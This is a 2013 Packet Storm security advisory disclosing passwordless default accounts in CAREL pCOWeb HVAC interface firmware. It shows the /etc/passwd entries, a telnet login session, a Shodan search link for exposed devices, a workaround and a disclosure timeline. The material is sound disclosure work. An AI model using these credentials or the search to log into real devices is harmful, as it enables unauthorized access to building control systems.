what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

CAREL pCOWeb 1.5.0 Default Credential Shell Access

CAREL pCOWeb 1.5.0 Default Credential Shell Access
Posted May 23, 2013
Authored by xistence | Site carel.com

The CAREL pCOWeb firmware version 1.5.0 and lower has two passwordless default accounts that allow direct shell access via telnet. These accounts are not exposed in the associated Web UI. CAREL pCOWeb is an embedded device used primarily for HVAC systems.

tags | advisory, web, shell
SHA-256 | 82b0a4cd0a0bf41d1802335815e91ba3801340fe8352516154ac02cad97445f8

CAREL pCOWeb 1.5.0 Default Credential Shell Access

Change Mirror Download
Title: CAREL pCOWeb firmware version 1.5.0 and lower passwordless accounts

Author: xistence ( xistence[at]0x90[.]nl )

Software link: http://ksa.carel.com/documents/10451/30816/pCOWeb_1_5_0.zip

Vendor site:
http://www.carel.com/carelcom/web/eng/catalogo/prodotto_dett.jsp?id_mercato=4&id_gamma=39&id_prodotto=350

Shodan: http://www.shodanhq.com/search?q=pCOWeb

Description: CAREL pCOWeb is an interface used in "air-conditioning
controls", "refrigeration controls" and "telemaintenance systems".

Vulnerability: Passwordless accounts



The CAREL pCOWeb firmware version 1.5.0 and lower contains a /etc/passwd
which has the following 2 passwordless accounts:

http::48:48:HTTP users:/usr/http/root:/bin/bash
nobody::99:99:nobody:/var/lib/nobody:/bin/bash

Logging in through telnet without a password is possible and it's not
possible to change or see these accounts through the web interface.

The "http" user basicly got access to all files (including /etc/passwd
which contains the hashes for the root user) as it's in almost every group:

$ telnet <ip>

Linux 2.4.21-rmk1 (localhost) (ttya0)


localhost login: http
No directory /usr/http/root!
Logging in with home = "/".
Executing profile
/usr/local/bin:/bin:/usr/bin
[http@localhost14:35:47 /]$ id
uid=48(http) gid=48(http)
groups=48(http),200(httpadmin),500(carel),80(update)


Solution (workaround):
Login with telnet and set a password or change the shell from "/bin/bash"
to "/bin/nologin".

[*] 01-25-2013 Contacted vendor
[*] 01-25-2013 Vendor responded that they will release an updated firmware, supplied workaround
[*] 05-22-2013 No updated firmware released, public disclosure
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close